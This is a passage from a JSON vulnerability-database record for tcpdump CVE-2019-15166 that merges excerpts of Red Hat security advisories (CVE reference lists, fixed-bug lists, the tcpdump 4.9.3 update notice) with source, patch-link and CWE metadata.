References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-10103\nhttps://access.redhat.com/security/cve/CVE-2018-10105\nhttps://access.redhat.com/security/cve/CVE-2018-14461\nhttps://access.redhat.com/security/cve/CVE-2018-14462\nhttps://access.redhat.com/security/cve/CVE-2018-14463\nhttps://access.redhat.com/security/cve/CVE-2018-14464\nhttps://access.redhat.com/security/cve/CVE-2018-14465\nhttps://access.redhat.com/security/cve/CVE-2018-14466\nhttps://access.redhat.com/security/cve/CVE-2018-14467\nhttps://access.redhat.com/security/cve/CVE-2018-14468\nhttps://access.redhat.com/security/cve/CVE-2018-14469\nhttps://access.redhat.com/security/cve/CVE-2018-14470\nhttps://access.redhat.com/security/cve/CVE-2018-14553\nhttps://access.redhat.com/security/cve/CVE-2018-14879\nhttps://access.redhat.com/security/cve/CVE-2018-14880\nhttps://access.redhat.com/security/cve/CVE-2018-14881\nhttps://access.redhat.com/security/cve/CVE-2018-14882\nhttps://access.redhat.com/security/cve/CVE-2018-16227\nhttps://access.redhat.com/security/cve/CVE-2018-16228\nhttps://access.redhat.com/security/cve/CVE-2018-16229\nhttps://access.redhat.com/security/cve/CVE-2018-16230\nhttps://access.redhat.com/security/cve/CVE-2018-16300\nhttps://access.redhat.com/security/cve/CVE-2018-16451\nhttps://access.redhat.com/security/cve/CVE-2018-16452\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2019-3884\nhttps://access.redhat.com/security/cve/CVE-2019-5018\nhttps://access.redhat.com/security/cve/CVE-2019-6977\nhttps://access.redhat.com/security/cve/CVE-2019-6978\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9455\nhttps://access.redhat.com/security/cve/CVE-2019-9458\nhttps://access.redhat.com/security/cve/CVE-2019-11068\nhttps://access.redhat.com/security/cve/CVE-2019-12614\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13225\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15165\nhttps://access.redhat.com/security/cve/CVE-2019-15166\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-15917\nhttps://access.redhat.com/security/cve/CVE-2019-15925\nhttps://access.redhat.com/security/cve/CVE-2019-16167\nhttps://access.redhat.com/security/cve/CVE-2019-16168\nhttps://access.redhat.com/security/cve/CVE-2019-16231\nhttps://access.redhat.com/security/cve/CVE-2019-16233\nhttps://access.redhat.com/security/cve/CVE-2019-16935\nhttps://access.redhat.com/security/cve/CVE-2019-17450\nhttps://access.redhat.com/security/cve/CVE-2019-17546\nhttps://access.redhat.com/security/cve/CVE-2019-18197\nhttps://access.redhat.com/security/cve/CVE-2019-18808\nhttps://access.redhat.com/security/cve/CVE-2019-18809\nhttps://access.redhat.com/security/cve/CVE-2019-19046\nhttps://access.redhat.com/security/cve/CVE-2019-19056\nhttps://access.redhat.com/security/cve/CVE-2019-19062\nhttps://access.redhat.com/security/cve/CVE-2019-19063\nhttps://access.redhat.com/security/cve/CVE-2019-19068\nhttps://access.redhat.com/security/cve/CVE-2019-19072\nhttps://access.redhat.com/security/cve/CVE-2019-19221\nhttps://access.redhat.com/security/cve/CVE-2019-19319\nhttps://access.redhat.com/security/cve/CVE-2019-19332\nhttps://access.redhat.com/security/cve/CVE-2019-19447\nhttps://access.redhat.com/security/cve/CVE-2019-19524\nhttps://access.redhat.com/security/cve/CVE-2019-19533\nhttps://access.redhat.com/security/cve/CVE-2019-19537\nhttps://access.redhat.com/security/cve/CVE-2019-19543\nhttps://access.redhat.com/security/cve/CVE-2019-19602\nhttps://access.redhat.com/security/cve/CVE-2019-19767\nhttps://access.redhat.com/security/cve/CVE-2019-19770\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20054\nhttps://access.redhat.com/security/cve/CVE-2019-20218\nhttps://access.redhat.com/security/cve/CVE-2019-20386\nhttps://access.redhat.com/security/cve/CVE-2019-20387\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20636\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/security/cve/CVE-2019-20812\nhttps://access.redhat.com/security/cve/CVE-2019-20907\nhttps://access.redhat.com/security/cve/CVE-2019-20916\nhttps://access.redhat.com/security/cve/CVE-2020-0305\nhttps://access.redhat.com/security/cve/CVE-2020-0444\nhttps://access.redhat.com/security/cve/CVE-2020-1716\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-1751\nhttps://access.redhat.com/security/cve/CVE-2020-1752\nhttps://access.redhat.com/security/cve/CVE-2020-1971\nhttps://access.redhat.com/security/cve/CVE-2020-2574\nhttps://access.redhat.com/security/cve/CVE-2020-2752\nhttps://access.redhat.com/security/cve/CVE-2020-2922\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3898\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-6405\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-8177\nhttps://access.redhat.com/security/cve/CVE-2020-8492\nhttps://access.redhat.com/security/cve/CVE-2020-8563\nhttps://access.redhat.com/security/cve/CVE-2020-8566\nhttps://access.redhat.com/security/cve/CVE-2020-8619\nhttps://access.redhat.com/security/cve/CVE-2020-8622\nhttps://access.redhat.com/security/cve/CVE-2020-8623\nhttps://access.redhat.com/security/cve/CVE-2020-8624\nhttps://access.redhat.com/security/cve/CVE-2020-8647\nhttps://access.redhat.com/security/cve/CVE-2020-8648\nhttps://access.redhat.com/security/cve/CVE-2020-8649\nhttps://access.redhat.com/security/cve/CVE-2020-9327\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-10029\nhttps://access.redhat.com/security/cve/CVE-2020-10732\nhttps://access.redhat.com/security/cve/CVE-2020-10749\nhttps://access.redhat.com/security/cve/CVE-2020-10751\nhttps://access.redhat.com/security/cve/CVE-2020-10763\nhttps://access.redhat.com/security/cve/CVE-2020-10773\nhttps://access.redhat.com/security/cve/CVE-2020-10774\nhttps://access.redhat.com/security/cve/CVE-2020-10942\nhttps://access.redhat.com/security/cve/CVE-2020-11565\nhttps://access.redhat.com/security/cve/CVE-2020-11668\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-12465\nhttps://access.redhat.com/security/cve/CVE-2020-12655\nhttps://access.redhat.com/security/cve/CVE-2020-12659\nhttps://access.redhat.com/security/cve/CVE-2020-12770\nhttps://access.redhat.com/security/cve/CVE-2020-12826\nhttps://access.redhat.com/security/cve/CVE-2020-13249\nhttps://access.redhat.com/security/cve/CVE-2020-13630\nhttps://access.redhat.com/security/cve/CVE-2020-13631\nhttps://access.redhat.com/security/cve/CVE-2020-13632\nhttps://access.redhat.com/security/cve/CVE-2020-14019\nhttps://access.redhat.com/security/cve/CVE-2020-14040\nhttps://access.redhat.com/security/cve/CVE-2020-14381\nhttps://access.redhat.com/security/cve/CVE-2020-14382\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-14422\nhttps://access.redhat.com/security/cve/CVE-2020-15157\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-15862\nhttps://access.redhat.com/security/cve/CVE-2020-15999\nhttps://access.redhat.com/security/cve/CVE-2020-16166\nhttps://access.redhat.com/security/cve/CVE-2020-24490\nhttps://access.redhat.com/security/cve/CVE-2020-24659\nhttps://access.redhat.com/security/cve/CVE-2020-25211\nhttps://access.redhat.com/security/cve/CVE-2020-25641\nhttps://access.redhat.com/security/cve/CVE-2020-25658\nhttps://access.redhat.com/security/cve/CVE-2020-25661\nhttps://access.redhat.com/security/cve/CVE-2020-25662\nhttps://access.redhat.com/security/cve/CVE-2020-25681\nhttps://access.redhat.com/security/cve/CVE-2020-25682\nhttps://access.redhat.com/security/cve/CVE-2020-25683\nhttps://access.redhat.com/security/cve/CVE-2020-25684\nhttps://access.redhat.com/security/cve/CVE-2020-25685\nhttps://access.redhat.com/security/cve/CVE-2020-25686\nhttps://access.redhat.com/security/cve/CVE-2020-25687\nhttps://access.redhat.com/security/cve/CVE-2020-25694\nhttps://access.redhat.com/security/cve/CVE-2020-25696\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-27813\nhttps://access.redhat.com/security/cve/CVE-2020-27846\nhttps://access.redhat.com/security/cve/CVE-2020-28362\nhttps://access.redhat.com/security/cve/CVE-2020-29652\nhttps://access.redhat.com/security/cve/CVE-2021-2007\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T\nlmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H\nEmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8\n4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4\nmWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL\nISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy\nAe5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk\n4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM\nuR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG\nkrzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv\nRjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6\nMcvuEaxco7U=\n=sw8i\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n1732329 - Virtual Machine is missing documentation of its properties in yaml editor\n1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv\n1791753 - [RFE] [SSP] Template validator should check validations in template\u0027s parent template\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1848954 - KMP missing CA extensions  in cabundle of mutatingwebhookconfiguration\n1848956 - KMP  requires downtime for CA stabilization during certificate rotation\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1853911 - VM with dot in network name fails to start with unclear message\n1854098 - NodeNetworkState on workers doesn\u0027t have \"status\" key due to nmstate-handler pod failure to run \"nmstatectl show\"\n1856347 - SR-IOV : Missing network name for sriov during vm setup\n1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS\n1859235 - Common Templates - after upgrade there are 2  common templates per each os-workload-flavor combination\n1860714 - No API information from `oc explain`\n1860992 - CNV upgrade - users are not removed from privileged  SecurityContextConstraints\n1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem\n1866593 - CDI is not handling vm disk clone\n1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs\n1868817 - Container-native Virtualization 2.6.0 Images\n1873771 - Improve the VMCreationFailed error message caused by VM low memory\n1874812 - SR-IOV: Guest Agent  expose link-local ipv6 address  for sometime and then remove it\n1878499 - DV import doesn\u0027t recover from scratch space PVC deletion\n1879108 - Inconsistent naming of \"oc virt\" command in help text\n1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running\n1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message\n1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used\n1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, *before* the NodeNetworkConfigurationPolicy is applied\n1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe tcpdump packages contain the tcpdump utility for monitoring network\ntraffic. The tcpdump utility can capture and display the packet headers on\na particular network interface or on all interfaces. \n\nThe following packages have been upgraded to a later upstream version:\ntcpdump (4.9.3). (BZ#1804063)\n\nSecurity Fix(es):\n\n* tcpdump: SMB data printing mishandled (CVE-2018-10103)\n\n* tcpdump: SMB data printing mishandled (CVE-2018-10105)\n\n* tcpdump: Out of bounds read/write in get_next_file() in tcpdump.c\n(CVE-2018-14879)\n\n* tcpdump: Buffer over-read in ldp_tlv_print() function in print-ldp.c\n(CVE-2018-14461)\n\n* tcpdump: Buffer over-read in icmp_print() function in print-icmp.c\n(CVE-2018-14462)\n\n* tcpdump: Buffer over-read in vrrp_print() function in print-vrrp.c\n(CVE-2018-14463)\n\n* tcpdump: Buffer over-read in lmp_print_data_link_subobjs() function in\nprint-lmp.c (CVE-2018-14464)\n\n* tcpdump: Buffer over-read in rsvp_obj_print() function in print-rsvp.c\n(CVE-2018-14465)\n\n* tcpdump: Buffer over-read in print-icmp6.c (CVE-2018-14466)\n\n* tcpdump: Buffer over-read in bgp_capabilities_print() in print-bgp.c\n(CVE-2018-14467)\n\n* tcpdump: Buffer over-read in mfr_print() function in print-fr.c\n(CVE-2018-14468)\n\n* tcpdump: Buffer over-read in ikev1_n_print() function in print-isakmp.c\n(CVE-2018-14469)\n\n* tcpdump: Buffer over-read in babel_print_v2() in print-babel.c\n(CVE-2018-14470)\n\n* tcpdump: Buffer over-read in ospf6_print_lshdr() function in\nprint-ospf6.c (CVE-2018-14880)\n\n* tcpdump: Buffer over-read in bgp_capabilities_print() function in\nprint-bgp.c (CVE-2018-14881)\n\n* tcpdump: Buffer over-read in function rpl_dio_printopt in print-icmp6.c\n(CVE-2018-14882)\n\n* tcpdump: Buffer over-read in print-802_11.c (CVE-2018-16227)\n\n* tcpdump: Access to uninitialized buffer in print_prefix() function in\nprint-hncp.c (CVE-2018-16228)\n\n* tcpdump: Buffer over-read in dccp_print_option() function in print-dccp.c\n(CVE-2018-16229)\n\n* tcpdump: Buffer over-read in bgp_attr_print() function in print-bgp.c\n(CVE-2018-16230)\n\n* tcpdump: Resource exhaustion in bgp_attr_print() function in print-bgp.c\n(CVE-2018-16300)\n\n* tcpdump: Buffer over-read in print_trans() function in print-smb.c\n(CVE-2018-16451)\n\n* tcpdump: Resource exhaustion in smb_fdata() funtion in smbutil.c\n(CVE-2018-16452)\n\n* tcpdump: Buffer overflow in lmp_print_data_link_subobjs() in print-lmp.c\n(CVE-2019-15166)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1760430 - CVE-2018-14882 tcpdump: Buffer over-read in function rpl_dio_printopt in print-icmp6.c\n1760445 - CVE-2018-16300 tcpdump: Resource exhaustion in bgp_attr_print() function in print-bgp.c\n1760447 - CVE-2018-14469 tcpdump: Buffer over-read in ikev1_n_print() function in print-isakmp.c\n1760449 - CVE-2018-14465 tcpdump: Buffer over-read in rsvp_obj_print() function in print-rsvp.c\n1760453 - CVE-2018-14463 tcpdump: Buffer over-read in vrrp_print() function in print-vrrp.c\n1760455 - CVE-2018-14462 tcpdump: Buffer over-read in icmp_print() function in print-icmp.c\n1760457 - CVE-2018-14879 tcpdump: Out of bounds read/write in in get_next_file() in tcpdump.c\n1760458 - CVE-2018-16229 tcpdump: Buffer over-read in dccp_print_option() function in print-dccp.c\n1760461 - CVE-2018-16227 tcpdump: Buffer over-read in print-802_11.c\n1760463 - CVE-2018-14881 tcpdump: Buffer over-read in bgp_capabilities_print() function in print-bgp.c\n1760464 - CVE-2018-14468 tcpdump: Buffer over-read in mfr_print() function in print-fr.c\n1760468 - CVE-2018-14880 tcpdump: Buffer over-read in ospf6_print_lshdr() function in print-ospf6.c\n1760504 - CVE-2018-10103 tcpdump: SMB data printing mishandled\n1760505 - CVE-2018-10105 tcpdump: SMB data printing mishandled\n1760506 - CVE-2018-14461 tcpdump: Buffer over-read in ldp_tlv_print() function in print-ldp.c\n1760507 - CVE-2018-14464 tcpdump: Buffer over-read in lmp_print_data_link_subobjs() function in print-lmp.c\n1760509 - CVE-2018-14466 tcpdump: Buffer over-read in print-icmp6.c\n1760512 - CVE-2018-14467 tcpdump: Buffer over-read in bgp_capabilities_print() in print-bgp.c\n1760513 - CVE-2018-14470 tcpdump: Buffer over-read in babel_print_v2() in print-babel.c\n1760514 - CVE-2018-16228 tcpdump: Access to uninitialized buffer in print_prefix() function in print-hncp.c\n1760516 - CVE-2018-16230 tcpdump: Buffer over-read in bgp_attr_print() function in print-bgp.c\n1760517 - CVE-2018-16451 tcpdump: Buffer over-read in print_trans() function in print-smb.c\n1760518 - CVE-2018-16452 tcpdump: Resource exhaustion in smb_fdata() funtion in smbutil.c\n1760520 - CVE-2019-15166 tcpdump: Buffer overflow in lmp_print_data_link_subobjs() in print-lmp.c\n1804063 - Rebase tcpdump to 4.9.3 to fix multiple CVEs\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "db": "PACKETSTORM",
        "id": "154710"
      },
      {
        "db": "PACKETSTORM",
        "id": "154931"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "159874"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-15166",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "159874",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "154710",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4632",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3840",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3814.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3885",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0692",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4244",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3814",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0289",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0864",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4513",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4094",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-147185",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160624",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154931",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161546",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161742",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "db": "PACKETSTORM",
        "id": "154710"
      },
      {
        "db": "PACKETSTORM",
        "id": "154931"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "159874"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "id": "VAR-201910-0929",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-12-17T23:36:12.385000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "tcpdump / CHANGES",
        "trust": 0.8,
        "url": "https://github.com/the-tcpdump-group/tcpdump/blob/tcpdump-4.9/CHANGES"
      },
      {
        "title": "(for 4.9.3) LMP: Add some missing bounds checks",
        "trust": 0.8,
        "url": "https://github.com/the-tcpdump-group/tcpdump/commit/0b661e0aa61850234b64394585cf577aac570bf4"
      },
      {
        "title": "tcpdump Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98865"
      },
      {
        "title": "Red Hat: Moderate: tcpdump security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204760 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: tcpdump vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4252-2"
      },
      {
        "title": "Ubuntu Security Notice: tcpdump vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4252-1"
      },
      {
        "title": "Debian Security Advisories: DSA-4547-1 tcpdump -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=52bed60eab5877e67a6585d3d056f248"
      },
      {
        "title": "Debian CVElist Bug Report Logs: tcpdump: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 CVE-2019-15166",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1249c534018e10fa98dc77eef5f0693a"
      },
      {
        "title": "Red Hat: Moderate: Red Hat OpenShift Container Storage 4.6.0 security, bug fix, enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205605 - Security Advisory"
      },
      {
        "title": "PIA-PC",
        "trust": 0.1,
        "url": "https://github.com/zanezhub/PIA-PC "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/khulnasoft-lab/awesome-security "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.9
      },
      {
        "problemtype": "CWE-119",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00015.html"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/4252-2/"
      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2019/oct/28"
